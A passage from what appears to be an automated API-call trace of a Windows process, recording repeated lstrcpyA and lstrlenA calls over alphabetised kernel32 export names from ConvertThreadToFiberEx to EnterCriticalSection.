lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.557] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.557] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.557] lstrlenA (lpString="COPYFILEA") returned 9 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.557] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.557] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.557] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.558] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.558] lstrlenA (lpString="COPYFILEW") returned 9 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.558] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.558] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.558] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.558] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.558] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.558] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.558] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.558] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.558] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.558] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.558] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.558] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.558] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.558] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.558] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.558] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.558] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.559] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.559] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.559] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.559] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.559] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.559] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.559] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.559] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.559] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.559] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.559] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.559] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.559] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.559] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.559] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.559] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.559] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.559] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.560] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.560] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.560] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.560] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.560] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.560] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.560] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.560] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.560] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.560] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.560] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.560] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.560] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.560] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.560] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.560] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.560] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.560] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.561] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.561] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.561] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.561] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.561] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.561] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.561] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.561] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.561] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.561] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.561] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.561] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.561] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.561] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.561] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.561] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.561] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.561] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.561] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.562] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.562] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.562] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.562] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.562] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.562] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.562] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.562] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.562] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.562] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.562] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.562] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.562] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.562] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.562] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.562] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.562] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.562] lstrlenA (lpString="DELETEATOM") returned 10 [0082.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.563] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.563] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.563] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.563] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.563] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.563] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.563] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.563] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.563] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.563] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.563] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.563] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.563] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.563] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.563] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.563] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.563] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.563] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.564] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.564] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.564] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.564] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.564] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.564] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.564] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.564] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.564] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.564] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.564] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.564] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" 